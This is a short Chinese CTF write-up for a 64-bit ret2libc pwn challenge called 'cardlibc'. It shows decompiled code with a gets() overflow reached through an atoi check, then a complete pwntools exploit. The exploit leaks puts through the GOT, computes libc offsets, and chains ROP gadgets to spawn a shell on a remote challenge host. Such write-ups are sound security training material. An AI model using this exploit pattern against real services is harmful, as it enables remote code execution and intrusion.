cardlibc(64位ret2libc)

题目：

int __fastcall main(int argc, const char **argv, const char **envp)
{
  char s[64]; // [rsp+0h] [rbp-40h] BYREF

  init(argc, argv, envp);
  __isoc99_scanf("%16s", s);
  if ( strchr(s, 45) )
  {
    joker();
    return 0;
  }
  else
  {
    if ( atoi(s) >= 0 )
      joker();
    else
      card();
    return 0;
  }
}


int joker()
{
  puts("Go back to Gotham, Batman won't hit you again.");
  puts(".\n.\n.\n.\n.\n.\n.\n");
  return puts("Welcome back to Gotham, Joker!\n");
}


int card()
{
  char s[64]; // [rsp+0h] [rbp-40h] BYREF

  puts("Give you a chance to fight Batman!");
  getchar();
  gets(s);
  return puts(s);
}

注意：payload = b'a'*(0x40+8)+p64(rdi)+p64(got)+p64(plt)+p64(main)这里的返回地址是main,如果改成card的话会报错
exp:

from pwn import *
from LibcSearcher import *
def conn():
	global r,elf,libc
	#r = process("./cardlibc")
	r = remote("1.95.36.136", 2106)
	elf = ELF("./cardlibc")

def pwn():
	got = elf.got["puts"]
	plt = elf.plt["puts"]
	main = elf.sym["main"]
	card = 0x40088f
	print(">>>",hex(got))
	r.sendline(b"3333333333")
	rdi = 0x00000000004009b3
	payload = b'a'*(0x40+8)+p64(rdi)+p64(got)+p64(plt)+p64(main)
	r.sendline(payload)
	r.recvline()
	r.recvline()
	puts = u64(r.recvline()[:-1].ljust(8,b'\x00'))
	print("puts>>>",hex(puts))
	#libc = LibcSearcher("puts",puts)
	libc = puts- 	0x06f6a0 	
	sys =  libc+0x0453a0
	sh =  libc+ 0x18ce57
	ret = 0x0000000000400649
	payload = b'a'*(0x40+8)+p64(rdi)+p64(sh)+p64(sys)
	r.sendline(b"3333333333")
	#gdb.attach(r)
	r.sendlineafter(b'Batman!\n',payload)
	
	r.interactive()
conn()
pwn()